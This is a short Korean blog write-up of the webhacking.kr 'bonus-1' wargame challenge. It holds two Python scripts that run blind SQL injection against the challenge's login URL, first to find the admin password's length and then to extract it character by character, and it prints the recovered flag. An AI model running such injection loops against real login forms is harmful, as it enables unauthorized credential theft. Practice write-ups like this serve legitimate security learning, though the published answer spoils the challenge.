guest/guest -> login success
admin/qwerty -> login fail
admin'#/qwerty -> wrong password
wrong password면 일단 맞는걸로
import requests
for i in range(1, 40):
url = f"https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw=q' or id='admin' and length(pw)={i}%23"
res = requests.get(url)
if 'wrong password' in res.text:
print(i)
break=> pw길이: 36
import requests
pw=""
for i in range(1, 37):
for c in range(33, 123):
url = f"https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw=q' or id='admin' and substr(pw,{i},1)=char({c})%23"
res = requests.get(url)
if 'wrong password' in res.text:
pw+=chr(c)
print(pw)
break=> there_is_no_rest_for_the_white_angel
대분자로 나오는데 lower 해줘야함
'워게임 > webhacking.kr' 카테고리의 다른 글
| webhacking.kr old 25번(php wrapper) (0) | 2021.10.23 |
|---|---|
| webhacking.kr old 22번(blind sql injection) (0) | 2021.10.23 |
| webhacking.kr old 12번(javascript난독화 aaencode) (0) | 2021.10.21 |
| webhacking.kr old 9번(sql injection) (0) | 2021.10.20 |
| webhacking.kr old 6번 (sql injection) (0) | 2021.10.20 |
댓글